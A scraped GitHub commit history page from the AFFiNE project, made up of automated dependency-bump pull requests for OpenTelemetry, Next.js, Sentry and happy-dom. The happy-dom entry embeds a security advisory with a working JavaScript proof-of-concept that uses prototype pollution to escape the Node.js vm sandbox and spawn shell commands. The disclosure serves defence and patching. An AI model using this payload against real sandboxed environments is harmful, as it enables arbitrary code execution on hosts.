[`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0530-2025-10-06) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145)) ([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.2 to ^0.53.0 ### [`v0.52.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0523-2025-09-29) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46) ##### Bug Fixes - force new release-please PR ([#​3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123)) ([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.1 to ^0.52.2 ### [`v0.52.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0522-2025-09-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28) ##### Bug Fixes - force new release-please PR ([#​3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098)) ([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.0 to ^0.52.1 ### [`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0520-2025-09-10) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034)) ([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.50.0 to ^0.51.0 ### [`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0510-2025-09-08) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec) ##### Features - **deps:** update otel deps ([#​3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027)) ([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.49.0 to ^0.50.0 ### [`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0500-2025-07-09) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930)) ([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.48.0 to ^0.49.0 ### [`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0490-2025-06-02) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871)) ([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.47.0 to ^0.48.0 ### [`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0480-2025-05-15) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828)) ([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.46.0 to ^0.47.0 ### [`v0.47.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0470-2025-03-18) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7) ##### ⚠ BREAKING CHANGES - chore!: Update to 2.x and 0.200.x @​opentelemetry/\* packages from opentelemetry-js.git per [2.x upgrade guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md) - The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0. This means that support for Node.js 14 and 16 has been dropped. - The minimum supported TypeScript version has been raised to 5.0.4. - The compilation target for transpiled TypeScript has been raised to ES2022 (from ES2017). ##### Bug Fixes - **deps:** update otel core experimental to ^0.57.2 ([#​2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716)) ([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da)) ##### Miscellaneous Chores - update to JS SDK 2.x ([#​2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738)) ([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.45.1 to ^0.46.0 </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MC4zMy42IiwidXBkYXRlZEluVmVyIjoiNDEuMTU2LjEiLCJ0YXJnZXRCcmFuY2giOiJjYW5hcnkiLCJsYWJlbHMiOlsiZGVwZW5kZW5jaWVzIl19--> --------- Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
35c2ad262f |
chore: bump next from 15.3.2 to 15.5.4 (#13739)
Bumps [next](https://github.com/vercel/next.js) from 15.3.2 to 15.5.4. <details> <summary>Release notes</summary> <p><em>Sourced from <a href="https://github.com/vercel/next.js/releases">next's releases</a>.</em></p> <blockquote> <h2>v15.5.4</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: ensure onRequestError is invoked when otel enabled (<a href="https://redirect.github.com/vercel/next.js/issues/83343">#83343</a>)</li> <li>fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)</li> <li>[devtool] fix overlay styles are missing (<a href="https://redirect.github.com/vercel/next.js/issues/83721">#83721</a>)</li> <li>Turbopack: don't match dynamic pattern for node_modules packages (<a href="https://redirect.github.com/vercel/next.js/issues/83176">#83176</a>)</li> <li>Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/82911">#82911</a>)</li> <li>[turbopack] Improve handling of symlink resolution errors in track_glob and read_glob (<a href="https://redirect.github.com/vercel/next.js/issues/83357">#83357</a>)</li> <li>Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/82939">#82939</a>)</li> <li>fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>)</li> <li>Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84077">#84077</a>)</li> </ul> <h3>Misc Changes</h3> <ul> <li>[CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>)</li> <li>CI: use KV for test timing data (<a href="https://redirect.github.com/vercel/next.js/issues/83745">#83745</a>)</li> <li>docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/yiminghe"><code>@yiminghe</code></a>, <a href="https://github.com/huozhi"><code>@huozhi</code></a>, <a href="https://github.com/devjiwonchoi"><code>@devjiwonchoi</code></a>, <a href="https://github.com/mischnic"><code>@mischnic</code></a>, <a href="https://github.com/lukesandberg"><code>@lukesandberg</code></a>, <a href="https://github.com/ztanner"><code>@ztanner</code></a>, <a href="https://github.com/icyJoseph"><code>@icyJoseph</code></a>, <a href="https://github.com/leerob"><code>@leerob</code></a>, <a href="https://github.com/fufuShih"><code>@fufuShih</code></a>, <a href="https://github.com/dwrth"><code>@dwrth</code></a>, <a href="https://github.com/aymericzip"><code>@aymericzip</code></a>, <a href="https://github.com/obendev"><code>@obendev</code></a>, <a href="https://github.com/molebox"><code>@molebox</code></a>, <a href="https://github.com/OoMNoO"><code>@OoMNoO</code></a>, <a href="https://github.com/pontasan"><code>@pontasan</code></a>, <a href="https://github.com/styfle"><code>@styfle</code></a>, <a href="https://github.com/HondaYt"><code>@HondaYt</code></a>, <a href="https://github.com/ryuapp"><code>@ryuapp</code></a>, <a href="https://github.com/lpalmes"><code>@lpalmes</code></a>, and <a href="https://github.com/ijjk"><code>@ijjk</code></a> for helping!</p> <h2>v15.5.3</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: validation return types of pages API routes (<a href="https://redirect.github.com/vercel/next.js/issues/83069">#83069</a>)</li> <li>fix: relative paths in dev in validator.ts (<a href="https://redirect.github.com/vercel/next.js/issues/83073">#83073</a>)</li> <li>fix: remove satisfies keyword from type validation to preserve old TS compatibility (<a href="https://redirect.github.com/vercel/next.js/issues/83071">#83071</a>)</li> </ul> <h3>Credits</h3> <p>Huge thanks to <a href="https://github.com/bgub"><code>@bgub</code></a> for helping!</p> <h2>v15.5.2</h2> <blockquote> <p>[!NOTE]<br /> This release is backporting bug fixes. It does <strong>not</strong> include all pending features/changes on canary.</p> </blockquote> <h3>Core Changes</h3> <ul> <li>fix: disable unknownatrules lint rule entirely (<a href="https://redirect.github.com/vercel/next.js/issues/83059">#83059</a>)</li> <li>revert: add ?dpl to fonts in /_next/static/media (<a href="https://redirect.github.com/vercel/next.js/issues/83062">#83062</a>)</li> </ul> <h3>Credits</h3> <!-- raw HTML omitted --> </blockquote> <p>... (truncated)</p> </details> <details> <summary>Commits</summary> <ul> <li><a href="https://github.com/vercel/next.js/commit/40f1d7814d8f1ab3d9e169b389015b8d6f258fb3"><code>40f1d78</code></a> v15.5.4</li> <li><a href="https://github.com/vercel/next.js/commit/cb30f0a1760b640b42cc15f34c55531499d3949c"><code>cb30f0a</code></a> [backport] docs: september improvements and fixes (<a href="https://redirect.github.com/vercel/next.js/issues/83997">#83997</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/b6a32bb57956f0bd4175d7b04e83c3bbad5249a8"><code>b6a32bb</code></a> [backport] [CNA] use linter preference (<a href="https://redirect.github.com/vercel/next.js/issues/83194">#83194</a>) (<a href="https://redirect.github.com/vercel/next.js/issues/84087">#84087</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/26d61f1e9a27a5f6c3dea5ac36c2c20c33cc0127"><code>26d61f1</code></a> [backport] Turbopack: flush Node.js worker IPC on error (<a href="https://redirect.github.com/vercel/next.js/issues/84079">#84079</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/e11e87a54734bb8136e2e5ac5c0c2218b1e57a48"><code>e11e87a</code></a> [backport] fix: error overlay not closing when backdrop clicked (<a href="https://redirect.github.com/vercel/next.js/issues/83981">#83981</a>) (<a href="https://redirect.github.com/vercel/next.js/issues/83">#83</a>...</li> <li><a href="https://github.com/vercel/next.js/commit/0a29888575d9f95e1cdf26d62bcab05a5a53bf95"><code>0a29888</code></a> [backport] fix: devtools initial position should be from next config (<a href="https://redirect.github.com/vercel/next.js/issues/83571">#83571</a>)...</li> <li><a href="https://github.com/vercel/next.js/commit/7a53950c136242fa77af5c02307a86966379e5a8"><code>7a53950</code></a> [backport] Turbopack: don't treat metadata routes as RSC (<a href="https://redirect.github.com/vercel/next.js/issues/83804">#83804</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/050bdf1ae70f71cac9a4634b1059ce386b15825a"><code>050bdf1</code></a> [backport] Turbopack: throw large static metadata error earlier (<a href="https://redirect.github.com/vercel/next.js/issues/83816">#83816</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/1f6ea09f8586ec26978c79d0a3d90b4b6b62f1a4"><code>1f6ea09</code></a> [backport] Turbopack: Improve handling of symlink resolution errors (<a href="https://redirect.github.com/vercel/next.js/issues/83805">#83805</a>)</li> <li><a href="https://github.com/vercel/next.js/commit/c7d1855499e507df5591c3697a365ae1a063ebb0"><code>c7d1855</code></a> [backport] CI: use KV for test timing data (<a href="https://redirect.github.com/vercel/next.js/issues/83860">#83860</a>)</li> <li>Additional commits viewable in <a href="https://github.com/vercel/next.js/compare/v15.3.2...v15.5.4">compare view</a></li> </ul> </details> <br /> [](https://docs.github.com/en/github/managing-security-vulnerabilities/about-dependabot-security-updates#about-compatibility-scores) Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`. [//]: # (dependabot-automerge-start) [//]: # (dependabot-automerge-end) --- <details> <summary>Dependabot commands and options</summary> <br /> You can trigger Dependabot actions by commenting on this PR: - `@dependabot rebase` will rebase this PR - `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it - `@dependabot merge` will merge this PR after your CI passes on it - `@dependabot squash and merge` will squash and merge this PR after your CI passes on it - `@dependabot cancel merge` will cancel a previously requested merge and block automerging - `@dependabot reopen` will reopen this PR if it is closed - `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually - `@dependabot show <dependency name> ignore conditions` will show all of the ignore conditions of the specified dependency - `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself) - `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself) You can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/toeverything/AFFiNE/network/alerts). </details> --------- Signed-off-by: dependabot[bot] <support@github.com> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com> Co-authored-by: DarkSky <darksky2048@gmail.com> |
||
|
|
c18840038f |
chore: bump up @sentry/electron version to v7 (#13652)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [@sentry/electron](https://redirect.github.com/getsentry/sentry-electron) | [`^6.1.0` -> `^7.0.0`](https://renovatebot.com/diffs/npm/@sentry%2felectron/6.6.0/7.2.0) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>getsentry/sentry-electron (@​sentry/electron)</summary> ### [`v7.2.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#720) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.1...7.2.0) - feat: Update JavaScript SDKs from [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) to [v10.17.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.17.0) - feat: Log os and device attributes ([#​1246](https://redirect.github.com/getsentry/sentry-electron/issues/1246)) ### [`v7.1.1`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#711) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.1.0...7.1.1) - fix: Preload injection path ([#​1243](https://redirect.github.com/getsentry/sentry-electron/issues/1243)) - fix: Preload `contextIsolation` issues ([#​1244](https://redirect.github.com/getsentry/sentry-electron/issues/1244)) - fix: Include `sentry.origin` with auto-generated logs ([#​1241](https://redirect.github.com/getsentry/sentry-electron/issues/1241)) ### [`v7.1.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#710) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/7.0.0...7.1.0) - feat: Update JavaScript SDKs from [v10.7.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.7.0) to [v10.11.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/10.11.0) ([#​1236](https://redirect.github.com/getsentry/sentry-electron/issues/1236)) - feat: Optional Namespaced IPC ([#​1234](https://redirect.github.com/getsentry/sentry-electron/issues/1234)) - fix: Export `ErrorEvent` type ([#​1229](https://redirect.github.com/getsentry/sentry-electron/issues/1229)) - fix: Only capture logs if `enableLogs` is true ([#​1235](https://redirect.github.com/getsentry/sentry-electron/issues/1235)) ### [`v7.0.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#700) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.11.0...7.0.0) This release updates the underlying Sentry JavaScript SDKs to v10 which includes some breaking changes. Check out the the [migration guide](./MIGRATION.md) for more details. - feat: Update JavaScript SDKs to v10.8.0 ([#​1205](https://redirect.github.com/getsentry/sentry-electron/issues/1205)) ### [`v6.11.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6110) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.10.0...6.11.0) - feat: Update JavaScript SDKs from [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) to [v9.46.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.46.0) - fix: Ensure native directory ends up in package ([#​1216](https://redirect.github.com/getsentry/sentry-electron/issues/1216)) ### [`v6.10.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#6100) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.9.0...6.10.0) - feat: Update JavaScript SDKs from [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) to [v9.45.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.45.0) - fix: Don't use `deepmerge` to merge events to remove circular ref. issues ([#​1210](https://redirect.github.com/getsentry/sentry-electron/issues/1210)) - fix: Support `node16` for TypeScript `moduleResolution` ([#​1203](https://redirect.github.com/getsentry/sentry-electron/issues/1203)) ### [`v6.9.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#690) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.8.0...6.9.0) - feat: Update JavaScript SDKs from [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) to [v9.43.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.43.0) - feat: Add `eventLoopBlockIntegration` ([#​1188](https://redirect.github.com/getsentry/sentry-electron/issues/1188)) - feat: Move renderer event loop block detection to an integration ([#​1196](https://redirect.github.com/getsentry/sentry-electron/issues/1196)) ### [`v6.8.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#680) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.7.0...6.8.0) - feat: Update JavaScript SDKs from [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) to [v9.26.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.26.0) - fix: Don't capture stack traces from destroyed renderers ([#​1165](https://redirect.github.com/getsentry/sentry-electron/issues/1165)) ### [`v6.7.0`](https://redirect.github.com/getsentry/sentry-electron/blob/HEAD/CHANGELOG.md#670) [Compare Source](https://redirect.github.com/getsentry/sentry-electron/compare/6.6.0...6.7.0) - feat: Update JavaScript SDKs from [v9.18.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.18.0) to [v9.25.0](https://redirect.github.com/getsentry/sentry-javascript/releases/tag/9.25.0) - feat: Add structured logging support ([#​1159](https://redirect.github.com/getsentry/sentry-electron/issues/1159)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xMzAuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE0My4xIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> |
||
|
|
a47042cbd5 |
chore: bump up happy-dom version to v20.0.2 [SECURITY] (#13765)
This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [happy-dom](https://redirect.github.com/capricorn86/happy-dom) | [`20.0.0` -> `20.0.2`](https://renovatebot.com/diffs/npm/happy-dom/20.0.0/20.0.2) | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | ### GitHub Vulnerability Alerts #### [CVE-2025-62410](https://redirect.github.com/capricorn86/happy-dom/security/advisories/GHSA-qpm2-6cq5-7pq5) ### Summary The mitigation proposed in GHSA-37j7-fg3j-429f for disabling eval/Function when executing untrusted code in happy-dom does not suffice, since it still allows prototype pollution payloads. ### Details The untrusted script and the rest of the application still run in the same Isolate/process, so attackers can deploy prototype pollution payloads to hijack important references like "process" in the example below, or to hijack control flow via flipping checks of undefined property. There might be other payloads that allow the manipulation of require, e.g., via (univeral) gadgets (https://www.usenix.org/system/files/usenixsecurity23-shcherbakov.pdf). ### PoC Attackers can pollute builtins like Object.prototype.hasOwnProperty() to obtain important references at runtime, e.g., "process". In this way, attackers might be able to execute arbitrary commands like in the example below via spawn(). ```js import { Browser } from "happy-dom"; const browser = new Browser({settings: {enableJavaScriptEvaluation: true}}); const page = browser.newPage({console: true}); page.url = 'https://example.com'; let payload = 'spawn_sync = process.binding(`spawn_sync`);normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(` `);typeof a.shell===`string`?c=a.shell:c=`/bin/sh`,b=[`-c`,g];}typeof a.argv0===`string`?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+`=`+d[f]);return{file:c,args:b,options:a,envPairs:e};};spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:`pipe`,readable:!0,writable:!1},{type:`pipe`,readable:!1,writable:!0},{type:`pipe`,readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!==`buffer`)for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + `spawnSync `+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};' page.content = `<html> <script> function f() { let process = this; ${payload}; spawnSync("touch", ["success.flag"]); return "success";} this.constructor.constructor.__proto__.__proto__.toString = f; this.constructor.constructor.__proto__.__proto__.hasOwnProperty = f; // Other methods that can be abused this way: isPrototypeOf, propertyIsEnumerable, valueOf </script> <body>Hello world!</body></html>`; await browser.close(); console.log(`The process object is ${process}`); console.log(process.hasOwnProperty('spawn')); ``` ### Impact Arbitrary code execution via breaking out of the Node.js' vm isolation. ### Recommended Immediate Actions Users can freeze the builtins in the global scope to defend against attacks similar to the PoC above. However, the untrusted code might still be able to retrieve all kind of information available in the global scope and exfiltrate them via fetch(), even without prototype pollution capabilities. Not to mention side channels caused by the shared process/isolate. Migration to [isolated-vm](https://redirect.github.com/laverdet/isolated-vm) is suggested instead. Cris from the Endor Labs Security Research Team, who has worked extensively on JavaScript sandboxing in the past, submitted this advisory. --- ### Release Notes <details> <summary>capricorn86/happy-dom (happy-dom)</summary> ### [`v20.0.2`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.2) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.1...v20.0.2) ##### :construction\_worker\_man: Patch fixes - Adds frozen intrinsics flag to workers in `@happy-dom/server-renderer` - By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1934](https://redirect.github.com/capricorn86/happy-dom/issues/1934) ### [`v20.0.1`](https://redirect.github.com/capricorn86/happy-dom/releases/tag/v20.0.1) [Compare Source](https://redirect.github.com/capricorn86/happy-dom/compare/v20.0.0...v20.0.1) ##### :construction\_worker\_man: Patch fixes - Adds warning for environment with unfrozen intrinsics (builtins) when JavaScript evaluation is enabled- By **[@​capricorn86](https://redirect.github.com/capricorn86)** in task [#​1932](https://redirect.github.com/capricorn86/happy-dom/issues/1932) - A security advisory has been reported showing that the recommended preventive measure of running Node.js with `--disallow-code-generation-from-strings` wasn't enough to protect against attackers escaping the VM context and accessing process-level functions. Big thanks to [@​cristianstaicu](https://redirect.github.com/cristianstaicu) for reporting this! - The documentation for how to run Happy DOM with JavaScript evaluation enabled in a safer way has been updated. Read more about it in the [Wiki](https://redirect.github.com/capricorn86/happy-dom/wiki/JavaScript-Evaluation-Warning) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/toeverything/AFFiNE). 